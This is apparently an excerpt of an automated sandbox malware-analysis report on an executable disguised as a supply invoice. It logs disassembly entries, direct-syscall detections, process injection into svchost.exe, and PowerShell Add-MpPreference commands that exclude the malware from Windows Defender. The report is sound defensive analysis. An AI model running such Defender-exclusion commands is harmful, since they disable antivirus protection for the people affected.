            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017349D0 mov eax, dword ptr fs:[00000030h]11_2_017349D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CA9D3 mov eax, dword ptr fs:[00000030h]11_2_017CA9D3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017969C0 mov eax, dword ptr fs:[00000030h]11_2_017969C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017889B3 mov esi, dword ptr fs:[00000030h]11_2_017889B3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017889B3 mov eax, dword ptr fs:[00000030h]11_2_017889B3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017889B3 mov eax, dword ptr fs:[00000030h]11_2_017889B3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017129A0 mov eax, dword ptr fs:[00000030h]11_2_017129A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017009AD mov eax, dword ptr fs:[00000030h]11_2_017009AD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017009AD mov eax, dword ptr fs:[00000030h]11_2_017009AD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796870 mov eax, dword ptr fs:[00000030h]11_2_01796870
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796870 mov eax, dword ptr fs:[00000030h]11_2_01796870
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E872 mov eax, dword ptr fs:[00000030h]11_2_0178E872
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E872 mov eax, dword ptr fs:[00000030h]11_2_0178E872
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01730854 mov eax, dword ptr fs:[00000030h]11_2_01730854
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704859 mov eax, dword ptr fs:[00000030h]11_2_01704859
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704859 mov eax, dword ptr fs:[00000030h]11_2_01704859
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01712840 mov ecx, dword ptr fs:[00000030h]11_2_01712840
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A483A mov eax, dword ptr fs:[00000030h]11_2_017A483A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A483A mov eax, dword ptr fs:[00000030h]11_2_017A483A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A830 mov eax, dword ptr fs:[00000030h]11_2_0173A830
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov eax, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov eax, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov eax, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov ecx, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov eax, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01722835 mov eax, dword ptr fs:[00000030h]11_2_01722835
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C810 mov eax, dword ptr fs:[00000030h]11_2_0178C810
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C8F9 mov eax, dword ptr fs:[00000030h]11_2_0173C8F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C8F9 mov eax, dword ptr fs:[00000030h]11_2_0173C8F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CA8E4 mov eax, dword ptr fs:[00000030h]11_2_017CA8E4
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E8C0 mov eax, dword ptr fs:[00000030h]11_2_0172E8C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D08C0 mov eax, dword ptr fs:[00000030h]11_2_017D08C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C89D mov eax, dword ptr fs:[00000030h]11_2_0178C89D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700887 mov eax, dword ptr fs:[00000030h]11_2_01700887
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FCB7E mov eax, dword ptr fs:[00000030h]11_2_016FCB7E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AEB50 mov eax, dword ptr fs:[00000030h]11_2_017AEB50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D2B57 mov eax, dword ptr fs:[00000030h]11_2_017D2B57
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D2B57 mov eax, dword ptr fs:[00000030h]11_2_017D2B57
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D2B57 mov eax, dword ptr fs:[00000030h]11_2_017D2B57
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D2B57 mov eax, dword ptr fs:[00000030h]11_2_017D2B57
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B4B4B mov eax, dword ptr fs:[00000030h]11_2_017B4B4B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B4B4B mov eax, dword ptr fs:[00000030h]11_2_017B4B4B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A8B42 mov eax, dword ptr fs:[00000030h]11_2_017A8B42
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796B40 mov eax, dword ptr fs:[00000030h]11_2_01796B40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796B40 mov eax, dword ptr fs:[00000030h]11_2_01796B40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CAB40 mov eax, dword ptr fs:[00000030h]11_2_017CAB40
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8B50 mov eax, dword ptr fs:[00000030h]11_2_016F8B50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172EB20 mov eax, dword ptr fs:[00000030h]11_2_0172EB20
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172EB20 mov eax, dword ptr fs:[00000030h]11_2_0172EB20
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C8B28 mov eax, dword ptr fs:[00000030h]11_2_017C8B28
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C8B28 mov eax, dword ptr fs:[00000030h]11_2_017C8B28
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177EB1D mov eax, dword ptr fs:[00000030h]11_2_0177EB1D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4B00 mov eax, dword ptr fs:[00000030h]11_2_017D4B00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708BF0 mov eax, dword ptr fs:[00000030h]11_2_01708BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708BF0 mov eax, dword ptr fs:[00000030h]11_2_01708BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708BF0 mov eax, dword ptr fs:[00000030h]11_2_01708BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178CBF0 mov eax, dword ptr fs:[00000030h]11_2_0178CBF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172EBFC mov eax, dword ptr fs:[00000030h]11_2_0172EBFC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AEBD0 mov eax, dword ptr fs:[00000030h]11_2_017AEBD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01720BCB mov eax, dword ptr fs:[00000030h]11_2_01720BCB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01720BCB mov eax, dword ptr fs:[00000030h]11_2_01720BCB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01720BCB mov eax, dword ptr fs:[00000030h]11_2_01720BCB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700BCD mov eax, dword ptr fs:[00000030h]11_2_01700BCD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700BCD mov eax, dword ptr fs:[00000030h]11_2_01700BCD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700BCD mov eax, dword ptr fs:[00000030h]11_2_01700BCD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B4BB0 mov eax, dword ptr fs:[00000030h]11_2_017B4BB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B4BB0 mov eax, dword ptr fs:[00000030h]11_2_017B4BB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710BBE mov eax, dword ptr fs:[00000030h]11_2_01710BBE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710BBE mov eax, dword ptr fs:[00000030h]11_2_01710BBE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177CA72 mov eax, dword ptr fs:[00000030h]11_2_0177CA72
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177CA72 mov eax, dword ptr fs:[00000030h]11_2_0177CA72
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AEA60 mov eax, dword ptr fs:[00000030h]11_2_017AEA60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173CA6F mov eax, dword ptr fs:[00000030h]11_2_0173CA6F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173CA6F mov eax, dword ptr fs:[00000030h]11_2_0173CA6F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173CA6F mov eax, dword ptr fs:[00000030h]11_2_0173CA6F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706A50 mov eax, dword ptr fs:[00000030h]11_2_01706A50
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710A5B mov eax, dword ptr fs:[00000030h]11_2_01710A5B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710A5B mov eax, dword ptr fs:[00000030h]11_2_01710A5B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01724A35 mov eax, dword ptr fs:[00000030h]11_2_01724A35
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01724A35 mov eax, dword ptr fs:[00000030h]11_2_01724A35
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173CA38 mov eax, dword ptr fs:[00000030h]11_2_0173CA38
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173CA24 mov eax, dword ptr fs:[00000030h]11_2_0173CA24
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172EA2E mov eax, dword ptr fs:[00000030h]11_2_0172EA2E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178CA11 mov eax, dword ptr fs:[00000030h]11_2_0178CA11
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173AAEE mov eax, dword ptr fs:[00000030h]11_2_0173AAEE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173AAEE mov eax, dword ptr fs:[00000030h]11_2_0173AAEE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700AD0 mov eax, dword ptr fs:[00000030h]11_2_01700AD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01734AD0 mov eax, dword ptr fs:[00000030h]11_2_01734AD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01734AD0 mov eax, dword ptr fs:[00000030h]11_2_01734AD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01756ACC mov eax, dword ptr fs:[00000030h]11_2_01756ACC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01756ACC mov eax, dword ptr fs:[00000030h]11_2_01756ACC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01756ACC mov eax, dword ptr fs:[00000030h]11_2_01756ACC
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708AA0 mov eax, dword ptr fs:[00000030h]11_2_01708AA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708AA0 mov eax, dword ptr fs:[00000030h]11_2_01708AA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01756AA4 mov eax, dword ptr fs:[00000030h]11_2_01756AA4
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738A90 mov edx, dword ptr fs:[00000030h]11_2_01738A90
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170EA80 mov eax, dword ptr fs:[00000030h]11_2_0170EA80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: read writeJump to behavior
